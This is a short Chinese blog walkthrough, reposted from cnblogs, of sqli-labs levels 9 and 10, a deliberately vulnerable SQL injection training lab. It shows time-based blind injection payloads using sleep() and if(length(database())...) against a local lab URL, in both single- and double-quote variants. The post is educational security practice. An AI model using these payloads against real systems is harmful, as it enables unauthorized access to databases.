码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs(9-10关)

时间:2020-02-07 18:49:03      阅读:124      评论:0      收藏:0      [点我收藏+]

标签:base   sleep   tab   存在   mic   时间   双引号   alt   ast   

第九关(Less-9):

  1.根据提示输入127.0.0.1/sqli-labs-master/Less-9/?id=1,回显正常

技术图片

  2.对sql注入漏洞进行判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘回显正常

技术图片

  3.使用sleep函数进行sql注入漏洞判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and sleep(5) --+,经过5s回显正常,说明存在注入漏洞

技术图片

  4.通过Less-8中的时间盲注进行数据库长度的猜解,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and if(length(database))=8,1,sleep(5)) --+,如果数据库长度为8,则返回较快。通过实验可知,返回较快,故当前数据库的长度为8

技术图片

  5.其余与Less-8中的猜解一样。

第十关(Less-10):

  127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(11)--+,Less-10只是将Less-9中的单引号变成双引号,其余的均相同。

技术图片

 

 

  

 

  

sqli-labs(9-10关)

标签:base   sleep   tab   存在   mic   时间   双引号   alt   ast   

原文地址:https://www.cnblogs.com/mxm0117/p/12273716.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!